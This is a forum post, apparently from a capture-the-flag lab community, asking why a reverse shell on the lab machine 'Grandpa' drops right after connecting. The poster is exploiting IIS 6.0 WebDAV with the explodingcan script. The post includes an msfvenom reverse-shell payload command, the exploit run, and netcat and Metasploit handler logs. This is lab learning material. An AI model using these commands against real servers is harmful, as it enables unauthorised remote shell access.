Hey guys,
I am trying to pop Grandpa without Metasploit. For this, I want to use explodingcan as it seems the most straightforward.
However, when I send my payload, I get a connection which immediately disappears again.
```
msfvenom -p windows/shell_reverse_tcp -f raw -v -sc -e x86/alpha_mixed LHOST=10.10.x.x LPORT=1337 EXITFUNC-thread -o shellcode

root@kali:~# python explodingcan.py http://10.10.10.14 shellcode
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2187
[*] Sending payload...

root@kali:~# nc -lvnp 1337
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.14.
Ncat: Connection from 10.10.10.14:1053.
```
I also tried setting up a staged payload instead and handling it with the multi/handler in Metasploit. However, the problem persists.
```
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.x.x:1032
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.14
[*] Command shell session 1 opened (10.10.x.x:1032 -> 10.10.10.14:1034) at 2019-07-08 20:53:21 +0200
[*] 10.10.10.14 - Command shell session 1 closed. Reason: User exit
```